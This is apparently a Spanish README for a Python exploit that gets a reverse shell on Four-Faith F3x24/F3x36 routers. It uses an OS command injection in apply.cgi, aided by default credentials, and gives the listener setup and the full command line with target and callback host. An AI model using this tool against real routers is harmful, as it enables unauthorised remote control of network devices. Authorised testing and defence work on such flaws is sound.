
Un exploit para routers Four-Faith para obtener una reverse shell.
Este es un exploit para los modelos de router Four-Faith F3x24 y F3x36 para obtener una reverse shell.
"Los modelos de router Four-Faith F3x24 y F3x36 están afectados por una vulnerabilidad de inyección de comandos del sistema operativo (SO). Al menos la versión de firmware 2.0 permite a atacantes autenticados y remotos ejecutar comandos arbitrarios del SO a través de HTTP al modificar la hora del sistema mediante apply.cgi. Además, esta versión de firmware tiene credenciales por defecto que, si no se cambian, convertirían efectivamente esta vulnerabilidad en un problema de ejecución remota de comandos del SO sin autenticación."
Fuente: nist.gov
Este script se basa en un payload observado por VulnCheck
Antes de ejecutar el exploit, inicia un servidor TCP en tu máquina.
Luego ejecuta
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
Donde
RHOST es la dirección IP remota. También puedes añadir un dominio.LHOST es la IP de tu servidor TCP en tu máquina.LPORT es el puerto de tu servidor TCP.USERNAMEPASSWORDRPORT es el puerto remoto del router. El valor por defecto es 80.Asegúrate de usar este exploit solo para pruebas y en entornos autorizados.
Nunca lo uses con fines maliciosos.